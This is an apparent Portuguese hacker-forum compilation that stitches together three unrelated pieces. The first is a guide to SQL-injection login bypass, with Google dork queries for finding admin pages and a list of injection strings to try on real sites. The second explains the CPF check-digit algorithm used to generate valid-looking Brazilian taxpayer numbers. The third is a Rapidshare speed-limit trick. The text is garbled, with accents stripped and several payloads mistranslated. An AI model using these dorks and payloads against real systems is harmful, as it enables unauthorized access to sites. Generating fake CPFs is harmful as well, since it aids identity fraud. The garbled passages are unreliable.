SQL injection Basico

SQL injection mtodo de insero de strings no banco de dados do servidor, podendo assim liberar os cookies e conseqentemente a permisso de administrador. Bem devido a alguns erros em banco de dados dos servidores possvel, ainda hoje, encontrar esse tipo de vulnerabilidade.

SQL Injection vem de injeo de SQL atravs de strings em campos de login ou senha, depedendo da pgina vulnervel. Um aliado para descobrir sites com essa vulnerabilidade o famoso Google que permite pesquisar por pginas visadas a campos de logins,isso nao significa que essas paginas j estejam vulneraveis.

Para pesquisarmos no google precisamo de um comando chamado allinurl. esse comando procura especificadamente aquilo que se vem depois dos dois pontos exemplo: allinurl:/site/admin/ Com esse codigo ele caar paginas com campos de logins de adiministraes.

Abaixo encontra-se uma lista com algums codigos para vc pesquisar no google:

allinurl:/webadmin/default.asp allinurl:/menu_admin/default.asp allinurl:/menu_admin/index.asp allinurl:/menu_admin/login.asp allinurl:/noticias/admin/ allinurl:/news/admin/ allinurl:/cadastro/admin/ allinurl:/portal/admin/

allinurl:/site/admin/ allinurl:/home/admin.asp allinurl:/home/admin/index.asp allinurl:/home/admin/default.asp allinurl:/home/admin/login.asp allinurl:/web/admin/index.asp

Pegue uma das strings acima e pesquise a vontade:

Aps feito isso sair uma lista de sites com pginas com campos de logins e senhas, at a tudo bem, agora vamos escani-los usando um scanner como acutinex, por exemplo, depois de scaneado e acuzando a suposta vulnerabilidade de sql injection s testarmos strings nos campos de logins da pagina afetada.

a mesma string usada no login deve ser usada no campo de senha.

Abaixo uma lista de strings:

b or 1= or 1 or | or a='a or = or 1=1 ) or (a'=a or 1=1 admin - ou 0=0 ou 0=0 ou 0=0 ou 0=0 # ou 0=0 #

ou 0=0 # ou x='x ou x=x ) ou ( x='x ou 1=1 ou 1=1 ou 1=1 ou a=a ou a=a ) ou ( a='a ) ou (a=a hi ou a=a hi ou 1=1 hi ou 1=1 hi ou a='a hi ) ou ( a='a hi) ou (a=a or x='x

Teste vrias strings at acertar uma que de uma confuso no banco de dados do servidor, tendo assim acesso a pgina da adiministrao.

Algoritmo do CPF - O que est por trs do gerador de CPF

Para exemplificar o processo vamos gerar um CPF vlido, calculando os dgitos verificadores de um nmero hipottico, 111.444.777-XX. Calculando o Primeiro Dgito Verificador O primeiro dgito verificador do CPF calculado utilizando-se o seguinte algoritmo. 1) Distribua os 9 primeiros dgitos em um quadro colocando os pesos 10, 9, 8, 7, 6, 5, 4, 3, 2 abaixo da esquerda para a direita, conforme representao abaixo:

1 10

1 9

1 8

4 7

4 6

4 5

7 4

7 3

7 2

2) Multiplique os valores de cada coluna:

1 10 10

1 9 9

1 8 8

4 7 28

4 6 24

4 5 20

7 4 28

7 3 21

7 2 14

3) Calcule o somatrio dos resultados (10+9+...+21+14) = 162

4) O resultado obtido (162) ser divido por 11. Considere como quociente apenas o valor inteiro, o resto da diviso ser responsvel pelo clculo do primeiro dgito verificador. Vamos acompanhar: 162 dividido por 11 obtemos 14 como quociente e 8 como resto da diviso. Caso o resto da diviso seja menor que 2, o nosso primeiro dgito verificador se torna 0 (zero), caso contrrio subtrai-se o valor obtido de 11, que nosso caso. Sendo assim nosso dgito verificador 118, ou seja, 3 (trs). J temos portanto parte do CPF, confira: 111.444.777-3X.

Calculando o Segundo Dgito Verificador 1) Para o clculo do segundo dgito ser usado o primeiro dgito verificador j calculado. Montaremos uma tabela semelhante a anterior s que desta vez usaremos na segunda linha os valores 11,10,9,8,7,6,5,4,3,2 j que estamos incorporando mais um algarismo para esse clculo. Veja:

1 11

1 10

1 9

4 8

4 7

4 6

7 5

7 4

7 3

3 2

2) Na prxima etapa faremos como na situao do clculo do primeiro dgito verificador, multiplicaremos os valores de cada coluna e efetuaremos o somatrio dos resultados obtidos:

(11+10+...+21+6) = 204.

1 11 11

1 10 10

1 9 9

4 8 32

4 7 28

4 6 24

7 5 35

7 4 28

7 3 21

3 2 6

3) Realizamos novamente o clculo do mdulo 11. Dividimos o total do somatrio por 11 e consideramos o resto da diviso.

Vamos acompanhar: 204 dividido por 11 obtemos 18 como quociente e 6 como resto da diviso.

4) Caso o valor do resto da diviso seja menor que 2, esse valor passa automaticamente a ser zero, caso contrrio (como no nosso caso) necessrio subtrair o valor obtido de 11 para se obter o dgito verificador. Logo, 11-6= 5, que o nosso segundo dgito verificador.

Neste caso chegamos ao final dos clculos e descobrimos que os dgitos verificadores do nosso CPF hipottico so os nmeros 3 e 5, portanto o CPF ficaria assim: 111.444.777-35

O gerador de CPF apresentado funciona com base neste algoritmo. A rotina de gerar CPF 's vlidos, inicialmente sorteia 9 nmeros. Calcula-se o 1 dgito verificador e integra-se o mesmo aos 9 nmeros iniciais. Prossegue-se com o clculo do segundo dgito verificador como ensinado. Ao final, o criador de CPF emite um nmero de CPF vlido

Um Pequeno Segredo no RAPIDSHARE

Bem o rapidshare mudou bastante, agora no existe limite de downloads, aps terminar um, pode ir para o segundo devendo aguardar apenas 30 ou 35 segundos

Porem com limitao de velocidade de downloads, por exemplo: Aqui tenho speedy 2 mega, faria um download a 200 at 215 Kbs por segundo, mas acabo fazendo a 80~70 Kbs cada download. Isso est fazendo com que muitos deixem de usar o rapidshare.

Mas existe um segredinho no rapidshare. Praticamente possibilita uma conta Premium gratuita, mas como?

Voc vai fazer um download por exemplo: Clicou em free, aguardou os 30 segundos e apareceu a opo download, mas ainda no clique nela.

Acima da opo download, existe uma opo chamada Advanced download settings, clicando nela, apareceram 7 opes de download. Provavelmente estar selecionada as opes de download limitado, que so todas menos a opo Telia Sonera e Nivel 3.

Selecionando a opo Telia Sonera ou Nivel 3, voc ir realizar o download em velocidade normal, sem limitaes............e para o prximo download, somente vai aguardar os 30 a 40 segundos e realizar ele com velocidade normal, tendo apenas selecionar as opes Telia Sonera ou nvel 3.

[Fonte: Universidade Hacker]